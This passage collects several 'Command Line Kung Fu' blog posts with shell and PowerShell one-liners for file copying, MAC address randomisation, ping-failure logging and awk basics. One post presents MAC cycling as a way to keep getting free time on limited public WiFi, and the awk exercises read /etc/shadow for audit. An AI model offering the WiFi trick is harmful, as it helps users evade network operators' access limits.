Tuesday, July 2, 2013

Episode #168: Scan On, You Crazy Command Line

Hal gets back to our roots

With one ear carefully tuned to cries of desperation from the Internet, it's no wonder I picked up on this plea from David Nides on Twitter:

Whenever I see a request to scan for files based on a certain criteria and then copy them someplace else, I immediately think of the "find ... | cpio -pd ..." trick I've used in several other Episodes.

Happily, "find" has "-mtime", "-atime", and "-ctime" options we can use for identifying the files. But they all want their arguments to be in terms of number of days. So I need to calculate the number of days between today and the end of 2012. Let's do that via a little command-line kung fu, shall we? That will make this more fun.

$ days=$(( ($(date +%Y) - 2012)*365 + $(date +%j | sed 's/^0*//') ))
$ echo $days
447

Whoa nelly! What just happened there? Well, I'm doing math with the bash "$(( ... ))" operator and assigning the result to a variable called "days" so I can use it later. But what's all that line noise in the middle?

  • "date +%Y" returns the current year. That's inside "$( ... )" so I can use the value in my calculations.
  • I subtract 2012 from the current year to get the number of years since 2012 and multiply that by 365. Screw you, leap years!
  • "date +%j" returns the current day of the year, a value from 001-365.
  • Unfortunately the shell interprets values with leading zeroes as octal and errors out on values like "008" and "097". So I use a little sed to strip the leading zeroes.

Hey, I said it would be fun, not that it would necessarily be a good idea!

But now that I've got my "$days" value, the answer to David's original request couldn't be easier:

$ find /some/dir -mtime +$days -atime +$days -ctime +$days | cpio -pd /new/dir

The "find" command locates files whose MAC times are all greater than our "$days" value-- that's what the "+$days" syntax means. After that, it's just a matter of passing the found files off to "cpio". Calculating "$days" was the hard part.

My final solution was short enough that I tweeted it back to David. Which took me all the way back to the early days of Command-Line Kung Fu, when Ed Skoudis had hair would tweet cute little CMD.EXE hacks that he could barely fit into 140 characters. And I would respond with bash code that would barely line wrap. Ah, those were the days!

Of course, Tim was still in diapers then. But he's come so far, that precocious little rascal! Let's see what he has for us this time!

Tim gets an easy one!

Holy Guacamole! This is FINALLY an easy one! Robocopy makes this super easy *and* it plays well with leap years. I feel like it is my birthday and I can finally get out of these diapers.

PS C:\> robocopy \some\dir \new\dir /MINLAD (Get-Date).DayOfYear /MINAGE (Get-Date).DayOfYear /MOV

Simply specify the source and destination directories and use /MOV to move the files. MINLAD will ignore files that have been accessed in the past X days (LAD = Last Access Date), and MINAGE does the same based on the creation date. All we need is the number of days since the beginning of the year. Fortunately, getting that number is super easy in PowerShell (I have no pity for Hal).

All Date objects have the property DayOfYear which is (surprise, surprise) the number of days since the beginning of the year (Get-Member will show all the available properties and methods of an object). All we need is the current date, which we get Get-Date.

DONE! That's all folks! You can go home now. I know you expected a long complicated command, but we don't have one here. However, if you feel that you need to read more you can go back and read the episodes where we cover some other options available with robocopy.

This command is so easy, simple, and short I could even fit it into a tweet!

Tuesday, June 18, 2013

Episode #167: Big MAC

Hal checks into Twitter:

So there I was, browsing my Twitter timeline and a friend forwarded a link to Jeremy Ashkenas' github site. Jeremy created an alias for changing your MAC address to a random value. This is useful when you're on a public WiFi network that only gives you a small amount of free minutes. Since most of these services keep track by noting your MAC address, as long as you keep cycling you MAC, you can keep using the network for free.

Here's the core of Jeremy's alias:

sudo ifconfig en0 ether `openssl rand -hex 6 | sed "s/\(..\)/\1:/g; s/.$//"`

Note that the syntax of the ifconfig command varies a great deal between various OS versions. On my Linux machine, the syntax would be "sudo ifconfig wlan0 hw ether..."-- you need "hw ether" after the interface name and not just "ether".

Anyway, this seemed like a lot of code just to generate a random MAC address. Besides, what if you didn't have the openssl command installed on your Linux box? So I decided to try and figure out how to generate a random MAC address in fewer characters and using commonly built-in tools.

What does a MAC address look like? It's six pairs of digits with colons between. "Pairs of digits with colons between" immediately made me think of time values. And this works:

$ date +00:11:22:%T
00:11:22:11:23:08

Just print three pairs of fixed digits followed by "hh:mm:ss". I originally tried "date +%T:%T". But in my testing, the ifconfig command didn't always like the fake MAC addresses that were generated this way. So specifying the first few octets was the way to go.

The only problem is that this address really isn't all that random. If there were a lot of people on the same WiFi network all using this trick, MAC address collisions could happen pretty easily. Though if everybody chose their own personal sequence for the first three octets, you could make this a lot less likely.

The Linux date command lets you output a nine-digit nanoseconds value with "%N". I could combine that with a few leading digits to generate a pseudo-random sequence of 12 digits:

$ date +000%N
000801073504

But now we need to use the sed expression in Jeremy's original alias to put the colons in. Or do we?

$ sudo ifconfig wlan0 hw ether $(date +000%N)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:80:12:43:53  
...

I admit that I was a little shocked when I tried this and it actually worked! I can't guarantee that it will work across all Unix-like operating systems, but it allows me to come up with a much shorter bit of fu compared to Jeremy's solution.

What if you were on a system that didn't have openssl installed and didn't have a date command that had nanosecond resolution? If your system has a /dev/urandom device (and most do) you could use the trick we used way back in Episode #85:

$ sudo ifconfig wlan0 hw ether 00$(head /dev/urandom | tr -dc a-f0-9 | cut -c1-10)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:7a:5f:be:a2:ca
...

Again I'm using two literal zeroes at the front of the MAC address, so that I create addresses that don't cause ifconfig to error out on me.

The expression above is not very short, but at least it uses basic commands that will be available on pretty much any Unix-like OS. If your ifconfig needs colons between the octets, then you'll have to add a little sed like Jeremy did:

$ sudo ifconfig wlan0 hw ether \
    00$(head /dev/urandom | tr -dc a-f0-9 | sed 's/\(..\)/:\1/g;' | cut -c1-15)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:d9:3e:0d:80:57  
...

Jeremy's sed is more complicated because he takes 12 digits and adds colons after each octet, but leaves a trailing colon at the end of the address. So he has a second substitution to drop the trailing colon. I'm using cut to trim off the extra output anyway, so I don't really need the extra sed substitution. Also, since I'm specifying the first octet outside of the "$(...)", my sed expression puts the colons in front of each octet.

So there you have it. There's a very short solution for my Linux box that has a date command with nanosecond resolution and a very forgiving ifconfig command. And a longer solution that should work on pretty much any Unix-like OS. But even my longest solution is surely going to look great compared to what Tim's going to have to deal with.

Tim wishes he hadn't checked into Twitter:

I'm so jealous of Hal. I think his entire command is shorter than the name of my interface. This command is painful, quite painful. I would very much suggest something like Technitium's Mac Address Changer, but since Hal set me up here we go...

To start of, we need to get the name of our target interface. Sadly, the names of the interfaces aren't as simply named as they are on a *nix box. Not only is the name 11 times longer, but it is not easy to type. If you run "ipconfig /all" you can find the name and copy/paste it. (By the way, I'm only going to use PowerShell here, the CMD.EXE version would be ugly^2).

PS C:\> $ifname = "Intel(R) 82574L Gigabit Network Connection"

The MAC address for each interface is stored somewhere in the registry under this even-less-easy-to-type Key:
HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\[Some 4 digit number]\

First, a bit of clarification. Many people (erroneously) refer to Keys as the name/value pairs, but those pairs are actually called Values. A key is the container object (similar to a directory). How about that for a little piece of trivia?

With PowerShell we can use Get-ChildItem (alias dir, ls, gci) to list all the keys and then Get-ItemProperty (alias gp) to list the DriverDesc values. A simple Where-Object filter (alias where, ?) will find the key we need.

PS C:\> Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Control\Class\`{4D36E972-E325-
 11CE-BFC1-08002bE10318`}\[0-9]*\ | Get-ItemProperty -Name DriverDesc | 
 ? DriverDesc -eq "Intel(R) 82574L Gigabit Network Connection"
DriverDesc   : Intel(R) 82574L Gigabit Network Connection
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SY...0318}\0010
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SY...0318}
PSChildName  : 0010
PSProvider   : Microsoft.PowerShell.Core\Registry

Note: the curly braces ({}) need to be prefixed with a back tick (`) so they are not interpreted as a script block.

So now we have the Key for our target network interface. Next, we need to generate a random MAC address. Fortunately, Windows does not requires the use of colons (or dots) in the MAC address. This is nice as it makes our command a little easier to read (a very very little, but we'll take any win we can). The acceptable values are between 000000000000 and fffffffffffe (ffffffffffff is the broadcast address and should be avoided). This is the range between 0 and 2^48-2 ([Math]::Pow(2,8*6)-2 = 281474976710654). The random number is then formatted as a 12 digit hex number.

PS C:\> [String]::Format("{0:x12}", (Get-Random -Minimum 0 -Maximum 281474976710655))
16db434bed4e
PS C:\> [String]::Format("{0:x12}", (Get-Random -Minimum 0 -Maximum 281474976710655))
a31bfae1296d

We have a random MAC address value and we know the Key, now we need to put those two pieces together to actually change the MAC address. The New-ItemProperty cmdlet will create the value if it doesn't exist and the -Force option will overwrite it if it already exists. This results in the final version of our ugly command. We could shorten the command a little (very little) bit, but this is the way it's mother loves it, so we'll leave it alone.

PS C:\> ls HKLM:\SYSTEM\CurrentControlSet\Control\Class\`{4D36E972-E325-11CE-BFC1-
 08002bE10318`}\0*\ | Get-ItemProperty -Name DriverDesc | ? DriverDesc -eq 
 "Intel(R) 82574L Gigabit Network Connection" | New-ItemProperty -Name 
 NetworkAddress -Value ([String]::Format("{0:x12}", (Get-Random -Minimum 0 
 -Maximum 281474976710655))) -PropertyType String -Force

You would think that after all of this mess we would be good to go, but you would be wrong. As with most things Windows, you could reboot the system to have this take affect, but that's no fun. We can accomplish the same goal by disabling and enabling the connection. This syntax isn't too bad, but we need to use a different long name here.

PS C:\> netsh set interface name="Wired Ethernet Connection" admin=DISABLED
PS C:\> netsh set interface name="Wired Ethernet Connection" admin=ENABLED

At this point you should be running with the new MAC address.

And now you can see why I recommend a better tool to do this...and why I envy Hal.

EDIT:
Andres Elliku wrote in and reminded me of the new NetAdapter cmdlets in version 3. Here is his response.

This is directed mainly to Tim as a suggestion to decrease his pain. :) (Tim's comment: for this I'm thankful!)

Powershell has included at least since version 2.0 the NetAdapter module. This means that in Powershell you could set the mac aadress with something like:

PS C:\> Set-NetAdapter -Name "Wi-Fi" -MacAddress ([String]::Format("{0:x12}", 
(Get-Random -Minimum 0 -Maximum 281474976710655))) | Restart-NetAdapter

NB! The adapter name might vary, but usually they are still pretty short.

The shorter interface names is one of my favorite features of Windows 8 and Windows 2012. Also, with these cmdlets we don't need the name if the device (Intel blah blah blah) but the newly shortened interface name. Great stuff Andres. Thanks for writing in! -Tim

EDIT 2:

@PowerShellGuy tweeted an even shorted version using the format operator and built-in byte conversion:

PS C:\> Set-NetAdapter "wi-fi" -mac ("{0:x12}" -f (get-random -max (256tb-1))) | 
Restart-NetAdapter

Well done for really shortening the command -Tim

Tuesday, March 12, 2013

Episode #166: Ping A Little Log For Me

We've been away for a while because, frankly, we ran out of material. In the meantime we tried to come up with some new ideas and there have had a few requests, but sadly they were all redundant, became scripts, or both. We've been looking long and hard for Fu that works in this format, and we've finally found it!

Nathan Sweaney wrote in with a great idea! It isn't a script, it isn't redundant, and it is quite useful. Three of the four of the criteria that makes a great episode (the fourth being beer fetching or beer opening). To top it off Nathan wrote the CMD.EXE portion himself. Thanks Nathan!

--Tim

Nathan Sweaney writes in:

Ping Network Monitor

Occasionally we have issues in the field where we think a customer's device is occasionally losing a connection, but we're not sure if, or when, or for how long. We need a log of when the connection is dropping so that we can compare to the customer's reports of issues. Sure there are fancy network monitoring tools that can help, but we're in a hurry with no budget.

In Linux this would be easy, but these are Windows boxen. So I hacked together the following one-liner for our techs to use in the field.

This command will ping an IP address once every second and when it doesn't get a response, it will log the time-stamp in a text file. Then we can compare those time-stamps to failure reports from the customer.

To use it, simply change the IP address 8.8.8.8 near the beginning to whatever IP we need to monitor. Then open a command prompt, CD into the directory you want the log file created, and run the command.

C:\> cmd.exe /v:on /c "FOR /L %i in (1,0,2) do @ping -n 1 8.8.8.8 |
find "Request timed out">NUL && (echo !date! !time! >> PingFail.txt) &
ping -n 2 127.0.0.1>NUL"

So let's dissect this. It's mostly just a combination of examples Ed has mentioned in the past.

First, we're using the "cmd.exe /v:on /c" command to allow for delayed environment variable expansion. Ed has explained in the past why that lets us do flexible variable parsing. This command wraps everything else.

The next layer of our onion is an infinite "FOR /L" loop that Ed mentioned WAY back. We're counting from 1 to 2 in steps of 0 so that our command will continue running until we manually stop it.

Inside of our FOR loop is where we really get to the meat. We've basically got 4 steps:

1) First we see @ping -n 1 8.8.8.8. The @ symbol says to hide the echo of the command to the screen. The switch (-n 1) says to only ping the IP once. And of course 8.8.8.8 is the address we want to ping.

2) Next we pipe the results of our ping into the FIND command and search for "Request timed out" to see if the ping failed. The last part of that >NUL says to dump the output from this command into NUL, because we don't really need to see it.

3) Now we get fancy. The && says to only run this command if the previous command succeeded. In other words, if our FIND command finds the text, which means our ping failed, then we run this command. And we've enclosed this command in parenthesis contain it as a single command. We need to use the "cmd.exe /v:on /c" command at the beginning to allow for delayed environment variable expansion; that way our time & date changes each iteration. So %date% and %time% becomes !date! and !time!.

And finally we're redirecting our output to a file called PingFail.txt. We use the >> operator append each new entry rather than overwrite with just >.

4) And finally we're on to the last step. As mentioned before, the & says to run the next command no matter what has already happened. This command simply pings localhost with (-n 2) which will give us a one-second delay. The first ping happens immediately, and the second ping happens after one second. This slows down our original ping back in step 1 which would otherwise fire off like a machine gun as fast as the FOR loop can go. Lastly, we're redirecting the output with >NUL because we don't care to see it.

WOW. I said it was convoluted. But it works, and it's rather simple to use.

Tim finds a letter in the mail slot:

Wow, it has been a while since we've dusted off the ol' kung fu for a blog post. I've missed it and I know Hal as too. In fact, he hasn't showered since our last episode. True story. This was his silent (but deadly) protest against our lack of ideas and usable suggestions. The Northwest can breathe a sigh of relief (in the now fresher air) now that we are back for this episode. I for one, missed the blog. Back to the Fu...

Nathan wrote in with his idea to log Ping failures. What a great idea for a quick and dirty network monitor. Thanks to CMD.EXE he's got a bit of funkyness to his command. Fortunately, we can be a little smoother with our approach.

PS C:\> for (;;) { Start-Sleep 2; ping -n 1 8.8.8.8 >$null; if(-not $?) { Get-Date -Format s | Tee-
Object mylog.txt -Append }}
2013-03-12T12:34:56

We start off with an infinite loop using the For loop but without any loop control structures. Without these structures there is nothing to limit the loop, and it will run forever...it will be UNSTOPPABLE! MWAAAAAHAHAHAHAHA! <cough> <cough> Sorry about that, it's been a while.

Inside our infinite loop we sleep for a few seconds. We could do it at the end, but for some reason I get inconsistent results when I do that. I have no idea why, and I've tried troubleshooting it for hours. That's OK, a pre-command nap never killed anyone.

After our brief nap, we do the ping. The results are sent into the garbage can that is the $NULL variable. Following this command we check the error state of the previous command by checking the value of $?. This variable is True if the previous command ran without error, if there was an error the the command is False. The If Statement is used to branch our logic based on this value. If it is False, the ping failed, and we need to log the error.

Inside our branch we get the current date with Get-Date (duh!) and change the format to the sortable format. We could use any format, but the OCD part of me likes this format. The formatted date is piped into the Tee-Object command which will append the date to a file as well as output to our console.

Notice we used the For loop here instead of a While loop. I did this to save single character. We can save a few more characters by using this command using aliases, shortened parameter names, and a little magic in our For loop.

PS C:\> for (;;sleep 2) {ping -n 1 8.8.8.8 >$null; if(-not $?) { date -f s | tee mylog.txt -a }}

I moved the Start-Sleep (alias sleep) cmdlet inside the For loop control. The For loops looks like this:

for ( variable initialization; condition; variable update ) {
  Code to execute while the condition is true
}

The variable initialization is run once before our loop starts. The condition is checked every time through the loop to see if we should continue the loop. We have no variable we care to initialize, and we want the loop to run forever so we don't use a condition. The variable update piece is executed after each time through the loop, and this we can use. Instead of modifying a variable used in the loop, we take a lovely two second nap. This gives us our nice delay between each ping.

There you have the long awaited PowerShell version of this command. It is better than CMD.EXE, but there is no nice way to use the short-circuit operator && or || operators to make this command more efficient. Don't tell Hal, but I'm really jealous of the way his shell can be used to complete this task. I'm jealous of his terseness...and his full head of hair.

Hal washes clean

Let's be clear. The only thing that smells around here is the Windows shells. Have to use ping to put a sleep in your loop? Sleep that works at the start of the loop but not the end? What kind of Mickey Mouse operating system is that?

The Linux solution doesn't look a lot different from the Windows solutions:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date; sleep 1; done

"while :; do ... done" is the most convenient way of doing an infinite loop in the shell. The ping command uses the "-c 1" option to only send a single ping and "-W 1" to only wait one second for the response. We send the ping output to /dev/null so that it doesn't clutter the output of our loop. Whenever the ping fails, it returns false and we end up running the date command on the right-hand side to output a timestamp. The last thing in the loop is a sleep for one second. And yes, Tim, it actually works at the end of the loop in my shell.

Well that was easy. Hmmm, I don't want to embarrass Nathan and Tim by making my part of the Episode too short. How about we make the output of the date command a little nicer:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date '+%F %T'; sleep 1; done
"%F" is the "full" ANSI-style date format "2013-03-12" and "%T" is the time in 24-hour notation. So we get "2013-03-12 04:56:22" instead of the default "Tue Mar 12 04:56:22 EST 2013"

Oh, you want to save the output in a file as well as having it show up in your terminal window? No problemo:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date; sleep 1; done | tee mylog.txt

Hooray for tee!

Well I can't tart this up any more to save Tim and Nathan's fragile egos. So I'm outta here to go find a shower.

Sunday, January 6, 2013

An AWK-ward Response

A couple of weeks ago I promised some answers to the exercises I proposed at the end of my last post. What we have here is a case of, "Better late than never!"

1. If you go back and look at the example where I counted the number of processes per user, you'll notice that the "UID" header from the ps command ends up being counted. How would you suppress this?

There's a couple of different ways you could attack this using the material I showed you in the previous post. One way would be to do string comparison on field $1:

$ ps -ef | awk '$1 != "UID" {print $1}' | sort | uniq -c | sort -nr
    178 root
     58 hal
      2 www-data
    ...

An alternative approach would be to use pattern matching to print lines that don't match the string "UID". The "!" operator means "not", so the expression "!/UID/" does what we want:

$ ps -ef | awk '!/UID/ {print $1}' | sort | uniq -c | sort -nr
    178 root
     57 hal
      2 www-data
    ...

You'll notice that the "!/UID/" version counts one less process for user "hal" than the string comparison version. That's because the pattern match is matching the "UID" in the awk code and not showing you that process. So the string comparison version is slightly more accurate.

2. Print out the usernames of all accounts with superuser privileges (UID is 0 in /etc/passwd).

Remember that /etc/passwd file is colon-delimited, so we'll use awk's "-F" operator to split on colons. UID is field #3 and the username is field #1:

$ awk -F: '$3 == 0 {print $1}' /etc/passwd
root

Normally, a Unix-like OS will only have a single UID 0 account named "root". If you find other UID 0 accounts in your password file, they could be a sign that somebody's doing something naughty.

3. Print out the usernames of all accounts with null password fields in /etc/shadow.

You'll need to be root to do this one, since /etc/shadow is only readable by the superuser:

# awk -F: '$2 == "" {print $1}' /etc/shadow

Again, we use "-F:" to split the fields in /etc/shadow. We look for lines where the second field (containing the password hash) is the empty string and print the first field (the username) when this condition is true. It's really not much different from the previous /etc/passwd example.

You should get no output. There shouldn't be any entries in /etc/shadow with null password hashes!

4. Print out process data for all commands being run as root by interactive users on the system (HINT: If the command is interactive, then the "TTY" column will have something other than a "?" in it)

The "TTY" column in the "ps" output is field #6 and the username field is #1:

# ps -ef | awk '$1 == "root" && $6 != "?" {print}'
root      1422     1  0 Jan05 tty4     00:00:00 /sbin/getty -8 38400 tty4
root      1427     1  0 Jan05 tty5     00:00:00 /sbin/getty -8 38400 tty5
root      1434     1  0 Jan05 tty2     00:00:00 /sbin/getty -8 38400 tty2
root      1435     1  0 Jan05 tty3     00:00:00 /sbin/getty -8 38400 tty3
root      1438     1  0 Jan05 tty6     00:00:00 /sbin/getty -8 38400 tty6
root      1614  1523  0 Jan05 tty7     00:09:00 /usr/bin/X :0 -nr -verbose -auth ... 
root      2082     1  0 Jan05 tty1     00:00:00 /sbin/getty -8 38400 tty1
root      5909  5864  0 13:42 pts/3    00:00:00 su -
root      5938  5909  0 13:42 pts/3    00:00:00 -su
root      5968  5938  0 13:47 pts/3    00:00:00 ps -ef
root      5969  5938  0 13:47 pts/3    00:00:00 awk $1 == "root" && $6 != "?" {print}

We look for the keyword "root" in the first field, and anything that's not "?" in the sixth field. If both conditions are true, then we just print out the entire line with "{print}".

Actually, "{print}" is the default action for awk. So we could shorten our code just a bit:

# ps -ef | awk '$1 == "root" && $6 != "?"'
root      1422     1  0 Jan05 tty4     00:00:00 /sbin/getty -8 38400 tty4
root      1427     1  0 Jan05 tty5     00:00:00 /sbin/getty -8 38400 tty5
root      1434     1  0 Jan05 tty2     00:00:00 /sbin/getty -8 38400 tty2
...

5. I mentioned that if you kill all the sshd processes while logged in via SSH, you'll be kicked out of the box (you killed your own sshd process) and unable to log back in (you've killed the master SSH daemon). Fix the awk so that it only prints out the PIDs of SSH daemon processes that (a) don't belong to you, and (b) aren't the master SSH daemon (HINT: The master SSH daemon is the one who's parent process ID is 1).

This one's a little tricky. Take a look at the sshd processes on my system:

# ps -ef | grep sshd
root      3394     1  0  2012 ?        00:00:00 /usr/sbin/sshd
root     13248  3394  0 Jan05 ?        00:00:00 sshd: hal [priv] 
hal      13250 13248  0 Jan05 ?        00:00:02 sshd: hal@pts/0  
root     25189  3394  0 08:27 ?        00:00:00 sshd: hal [priv] 
hal      25191 25189  0 08:27 ?        00:00:00 sshd: hal@pts/1  
root     25835 25807  0 15:33 pts/1    00:00:00 grep sshd

For modern SSH daemons with "Privilege Separation" enabled, there are actually two sshd processes per login. There's a root-owned process marked as "sshd: <user> [priv]" and a process owned by the user marked as "sshd: <user>@<tty>". Life would be a whole lot easier if both processes were identified with the associated pty, but alas things didn't work out that way. So here's what I came up with:

# ps -ef | awk '/sshd/ && !($3 == 1 || /sshd: hal[@ ]/) {print $2}'

First we eliminate all processes except for the sshd processes with "/sshd/". We only want to print out the process IDs if it's not the master SSH daemon ("$3 == 1" to make sure the PPID isn't 1) or if it's not one of my SSH daemons ("/sshd: hal[@ ]/" means the string "sshd: hal" followed by either "@" or space). If everything looks good, then print the process ID of the process ("{print $2}").

Frankly, that's some pretty nasty awk. I'm not sure it's something I'd come up with easily on the spur of the moment.

6. Use awk to parse the output of the ifconfig command and print out the IP address of the local system.

Here's the output from ifconfig on my system:

$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr f0:de:f1:29:c7:18  
          inet addr:192.168.0.14  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::f2de:f1ff:fe29:c718/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7724312 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13553720 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:711630936 (711.6 MB)  TX bytes:17529013051 (17.5 GB)
          Memory:f2500000-f2520000 

So this is a reasonable first approximation:

$ ifconfig eth0 | awk '/inet addr:/ {print $2}'
addr:192.168.0.14

The only problem is the "addr:" bit that's still hanging on. awk has a number of built-in functions, including substr() which can help us in this case:

$ ifconfig eth0 | awk '/inet addr:/ {print substr($2, 6)}'
192.168.0.14

substr() takes as arguments the string we're working on (field $2 in this case) and the place in the string where you want to start (for us, that's the sixth character so we skip over the "addr:"). There's an optional third argument which is the number of characters to grab. If you leave that off, then you just get the rest of the string, which is what we want here.

There are lots of other useful built-in functions in awk. Consult the manual page for further info.

7. Parse the output of "lsof -nPi" and output the unique process name, PID, user ID, and port combinations for all processes that are in "LISTEN" mode on ports on the system.

Let's take a look at the "lsof -nPi" output using awk to match only the lines for "LISTEN" mode:

# lsof -nPi | awk '/LISTEN/'
sshd      1216     root    3u  IPv4   5264      0t0  TCP *:22 (LISTEN)
sshd      1216     root    4u  IPv6   5266      0t0  TCP *:22 (LISTEN)
mysqld    1610    mysql   10u  IPv4   6146      0t0  TCP 127.0.0.1:3306 (LISTEN)
vmware-au 1804     root    8u  IPv4   6440      0t0  TCP *:902 (LISTEN)
cupsd     1879     root    6u  IPv6  73057      0t0  TCP [::1]:631 (LISTEN)
cupsd     1879     root    8u  IPv4  73058      0t0  TCP 127.0.0.1:631 (LISTEN)
apache2   1964     root    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   1964     root    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
apache2   4112 www-data    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   4112 www-data    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
apache2   4113 www-data    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   4113 www-data    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
skype     5133      hal   41u  IPv4 104783      0t0  TCP *:6553 (LISTEN)

Process name, PID, and process owner are fields 1-3 and the protocol and port are in fields 8-9. So that suggests the following awk:

# lsof -nPi | awk '/LISTEN/ {print $1, $2, $3, $8, $9}'
sshd 1216 root TCP *:22
sshd 1216 root TCP *:22
mysqld 1610 mysql TCP 127.0.0.1:3306
vmware-au 1804 root TCP *:902
cupsd 1879 root TCP [::1]:631
cupsd 1879 root TCP 127.0.0.1:631
apache2 1964 root TCP *:80
apache2 1964 root TCP *:443
apache2 4112 www-data TCP *:80
apache2 4112 www-data TCP *:443
apache2 4113 www-data TCP *:80
apache2 4113 www-data TCP *:443
skype 5133 hal TCP *:6553

And if we want the unique entries, then just use "sort -u":

# lsof -nPi | awk '/LISTEN/ {print $1, $2, $3, $8, $9}' | sort -u
apache2 1964 root TCP *:443
apache2 1964 root TCP *:80
apache2 4112 www-data TCP *:443
apache2 4112 www-data TCP *:80
apache2 4113 www-data TCP *:443
apache2 4113 www-data TCP *:80
cupsd 1879 root TCP 127.0.0.1:631
cupsd 1879 root TCP [::1]:631
mysqld 1610 mysql TCP 127.0.0.1:3306
skype 5133 hal TCP *:6553
sshd 1216 root TCP *:22
vmware-au 1804 root TCP *:902

Looking at the output, I'm not sure I care about all of the different apache2 instances. All I really want to know is which program is using port 80/tcp and 443/tcp. So perhaps we should just drop the PID and process owner:

# lsof -nPi | awk '/LISTEN/ {print $1, $8, $9}' | sort -u
apache2 TCP *:443
apache2 TCP *:80
cupsd TCP 127.0.0.1:631
cupsd TCP [::1]:631
mysqld TCP 127.0.0.1:3306
skype TCP *:6553
sshd TCP *:22
vmware-au TCP *:902

In the above output you see cupsd bound to both the IPv4 and IPv6 loopback address. If you just care about the port numbers, we can flash a little sed to clean things up:

# lsof -nPi | awk '/LISTEN/ {print $1, $8, $9}' | \
    sed 's/[^ ]*:\([0-9]*\)/\1/' | sort -u -n -k3
sshd TCP 22
apache2 TCP 80
apache2 TCP 443
cupsd TCP 631
vmware-au TCP 902
mysqld TCP 3306
skype TCP 6553

In the sed expression I'm matching "some non-space characters followed by a colon" ("[^ ]*:") with some digits afterwards ("[0-9]*"). The digits are the port number, so we replace the matching expression with just the port number. Notice I used "\(...\)" around the "[0-9]*" to create a sub-expression that I can substitute on the right-hand side as "\1".

I've also modified the final "sort" command so that we get a numeric ("-n") sort on the port number ("-k3" for the third column). That makes the output look more natural to me.

I guess the moral of the story here is that awk is good for many things, but not necessarily for everything. Don't forget that there are other standard commands like sed and sort that can help produce the output that you're looking for.

Happy awk-ing everyone!

Thursday, December 20, 2012

AWK-ward!

Yesterday I got an email friend who complained that "awk is still a mystery". Not being one to ignore a cry for help with the command line, I was motivated to write up a simple introduction to the basics of awk. But where to post it? I know! We've got this little blog we're not doing anything with at the moment (er, yeah, sorry about that folks-- life's been exciting for the Command Line Kung Fu team recently)...

Lesson #1 -- It's a big loop!

The first thing you need to understand about awk is that it reads and operates on each line of input one at a time. It's as if your awk code were sitting inside a big loop:

for each line of input
    # your code is here
end loop

Your code goes in curly braces. So the simplest awk program is one that just prints out every line of a file:

awk '{print}' /etc/passwd

Nothing too exciting there. It's just a more complicated way to "cat /etc/passwd". Note that you generally want to enclose your awk code in single quotes like I did in the example above. This prevents special characters in the awk script from being interpolated by your shell before they even get to awk.

Lesson #2 -- awk splits the line into fields

One of the nice features of awk is that it automatically splits up each input line using whitespace as the delimiter. It doesn't matter how many spaces/tabs appear in between items on the line, each chunk of whitespace in its entirety is treated as a delimiter.

The whitespace-delimited fields are put into variables named $1, $2, and so on. Rather than just doing "print" as we did in the last example (which prints out the whole original line), you can print out any of the individual fields by number. For example, I can pull out the percentage used (field 5) and file system mount point (field 6) from df output:

$ df -h -t ext4 | awk '{print $5, $6}'
Use% Mounted
58% /
24% /boot
42% /var
81% /home
89% /usr

The comma in the "print $5, $6" expression causes awk to put a space between the two fields. If you did "print $5 $6", you'd get the two fields jammed up against each other with no space between them.

We could use a similar strategy to pull out just the usernames from ps (field 1):

$ ps -ef | awk '{print $1}'
UID
root
root
root
...

Not so interesting maybe, until you start combining it with other shell primitives:

$ ps -ef | awk '{print $1}' | sort | uniq -c | sort -nr
    188 root
     70 hal
      2 www-data
      2 avahi
      2 108
      1 UID
      1 syslog
      1 rtkit
      1 ntp
      1 mysql
      1 gdm
      1 daemon
      1 102

Once we sort all the usernames in order, we can use "uniq -c" to count the number of processes running as each user. The final "sort -nr" gives us a descending ("-r") numeric ("-n") sort of the counts.

And this is fundamentally what's interesting about awk. It's great in the middle of a shell pipeline to be able to pull out individual fields that we're interested in processing further.

Lesson #3 -- Being selective

The other cool power of awk is that you can operate on selected lines of your input and ignore the rest. Any awk statement like "{print}" can optionally be preceded by a conditional operator. If a conditional operation exists, then your awk code will only operate on lines that match the expression.

The most common conditional operator is "/.../", which does pattern matching. For example, I could pull out the process IDs of all sshd processes like this:

$ ps -ef | awk '/sshd/ {print $2}'
1366
10883

That output is maybe more interesting when you use it with the kill command to kick people off of your system:

# kill $(ps -ef | awk '/sshd/ {print $2}')

Of course, you better be on the system console when you execute that command. Otherwise, you've just locked yourself out of the box!

While pattern matching tends to get used most frequently, awk has a full suite of comparison and logical operators. Returning to our df example, what if we wanted to print out only the file systems that were more than 80% full? Remember that the percent used is in field 5 and the file system mount point is field 6. If field 5 is more than 80, we want to print field 6:

$ df -h -t ext4 | awk '($5 > 80) {print $6}'
Mounted
/home
/usr

Whoops! The header line ends up getting dumped out too! We'd actually like to suppress that. I could use the tail command to strip that out, but I can also do it in our awk statement:

$ df -h -t ext4 | awk '$5 ~ /[0-9]/ && ($5 > 80) {print $6}'
/home
/usr

